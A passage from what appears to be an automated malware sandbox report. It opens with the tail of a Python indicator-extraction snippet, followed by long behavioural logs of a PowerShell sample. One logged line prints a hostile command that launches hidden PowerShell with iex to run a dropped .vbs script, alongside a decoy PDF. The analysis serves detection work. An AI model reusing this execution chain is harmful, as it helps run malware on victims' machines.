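    for rec in extract_iocs(AMSI_FRAGMENT):
        note = "" if rec["scheme_known"] else f"  (scheme prefix not decoded: {rec['prefix']!r})"
        print(f"{rec['host']}{rec['path']}{note}")
```

The first record decodes to a PDF whose name matches the local -fz file name, i.e. a decoy document; the second is a .vbs fetched over plain HTTP, consistent with the download-and-execute behaviour the report flags. Both hosts remain inferred until confirmed elsewhere in the report.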

      Hooking and other Techniques for Hiding and Protection

      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5460
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4259
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6411
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3244
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7984 | Thread sleep time: -11068046444225724s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7528 | Thread sleep count: 6411 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7528 | Thread sleep count: 3244 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7560 | Thread sleep time: -7378697629483816s >= -30000s
      Source: C:\Windows\System32\svchost.exe TID: 1476 | Thread sleep time: -30000s >= -30000s
      Source: C:\Windows\System32\svchost.exe | File opened: PhysicalDrive0
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
      Source: powershell.exe, 00000003.00000002.1291434839.000001FC38E9D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tEventVmNetworkAdapter',
      Source: powershell.exe, 00000003.00000002.1291434839.000001FC38E9D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: 'Remove-NetEventVmNetworkAdapter',
      Source: powershell.exe, 00000003.00000002.1291434839.000001FC37458000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Remove-NetEventVmNetworkAdapter
      Source: powershell.exe, 00000003.00000002.1291434839.000001FC38E9D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: 'MSFT_NetEventVmNetworkAdatper.cdxml',
      Source: powershell.exe, 00000003.00000002.1291434839.000001FC38E9D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Get-NetEventVmNetworkAdapterX
      Source: powershell.exe, 00000003.00000002.1291434839.000001FC37458000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Add-NetEventVmNetworkAdapter
      Source: powershell.exe, 00000003.00000002.1291434839.000001FC38E9D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Remove-NetEventVmNetworkAdapterX
      Source: powershell.exe, 00000003.00000002.1291434839.000001FC38E9D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: +MSFT_NetEventVmNetworkAdatper.format.ps1xmlX
      Source: svchost.exe, 0000000D.00000002.2484293170.0000022691C2B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW lE
      Source: powershell.exe, 00000003.00000002.1291434839.000001FC38E9D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Add-NetEventVmNetworkAdapterX
      Source: powershell.exe, 00000000.00000002.1514778693.00000198A0180000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.2486221710.0000022697454000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
      Source: powershell.exe, 00000003.00000002.1291434839.000001FC38E9D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: #MSFT_NetEventVmNetworkAdatper.cdxmlX
      Source: powershell.exe, 00000003.00000002.1291434839.000001FC38E9D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: 'Add-NetEventVmNetworkAdapter',
      Source: powershell.exe, 00000003.00000002.1291434839.000001FC38E9D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: 'Get-NetEventVmNetworkAdapter',
      Source: powershell.exe, 00000003.00000002.1291434839.000001FC37458000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Get-NetEventVmNetworkAdapter
      Source: powershell.exe, 00000003.00000002.1291434839.000001FC38E9D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: 'MSFT_NetEventVmNetworkAdatper.format.ps1xml',
      Source: powershell.exe, 00000000.00000002.1514778693.00000198A0180000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug

      HIPS / PFW / Operating System Protection Evasion

      Source: Yara match | File source: amsi64_7272.amsi.csv, type: OTHER
      Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7272, type: MEMORYSTR
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\idj34h.vbs'"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\List of Required items and services.pdf"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
